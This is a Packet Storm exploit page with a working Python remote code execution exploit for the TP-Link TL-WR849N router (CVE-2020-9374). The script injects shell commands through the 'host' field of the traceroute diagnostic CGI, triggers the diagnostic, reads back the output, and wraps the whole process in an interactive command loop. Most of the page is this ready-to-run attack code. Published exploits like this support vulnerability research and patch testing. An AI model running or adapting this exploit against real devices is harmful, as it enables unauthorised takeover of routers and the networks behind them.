exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

TP-Link TL-WR849N Remote Code Execution

TP-Link TL-WR849N Remote Code Execution
Posted Mar 2, 2020
Authored by Elber Tavares

TP-Link TL-WR849N suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2020-9374
SHA-256 | 95d81d485c8d63207e1a1d780392d1575772a750d2a845ebf46f2f0f27699258

TP-Link TL-WR849N Remote Code Execution

Change Mirror Download
# Exploit Title: TP LINK TL-WR849N - Remote Code Execution
# Date: 2019-11-20
# Exploit Author: Elber Tavares
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware
# Version: TL-WR849N 0.9.1 4.16
# Tested on: linux, windows
# CVE : CVE-2020-9374


import requests

def output(headers,cookies):
url = 'http://192.168.0.1/cgi?1'
data = ''
data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\x0d\x0a'
data += 'diagnosticsState\x0d\x0a'
data += 'X_TP_HopSeq\x0d\x0a'
data += 'X_TP_Result\x0d\x0a'
r = requests.post(url,data=data,headers=headers,cookies=cookies)
saida = r.text
filtro = saida.replace(': Name or service not known','')
filtro = filtro.replace('[0,0,0,0,0,0]0','')
filtro = filtro.replace('diagnosticsState=','')
filtro = filtro.replace('X_TP_HopSeq=0','')
filtro = filtro.replace('X_TP_Result=','')
print(filtro[:-8])

def aceppt(headers,cookies):
url = 'http://192.168.0.1/cgi?7'
data = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a'
r = requests.post(url,data=data,headers=headers,cookies=cookies)
output(headers,cookies)


def inject(command,headers,cookies):
url = 'http://192.168.0.1/cgi?2'
data = ''
data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\x0d\x0a'
data += 'maxHopCount=20\x0d\x0a'
data += 'timeout=5\x0d\x0a'
data += 'numberOfTries=1\x0d\x0a'
data += 'host=\"$('+command+')\"\x0d\x0a'
data += 'dataBlockSize=64\x0d\x0a'
data += 'X_TP_ConnName=ewan_pppoe\x0d\x0a'
data += 'diagnosticsState=Requested\x0d\x0a'
data += 'X_TP_HopSeq=0\x0d\x0a'
r = requests.post(url,data=data,headers=headers,cookies=cookies)
aceppt(headers,cookies)



def main():
cookies = {"Authorization": "Basic REPLACEBASE64AUTH"}
headers = {'Content-Type': 'text/plain',
'Referer': 'http://192.168.0.1/mainFrame.htm'}
while True:
command = input('$ ')
inject(command,headers,cookies)


main()
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close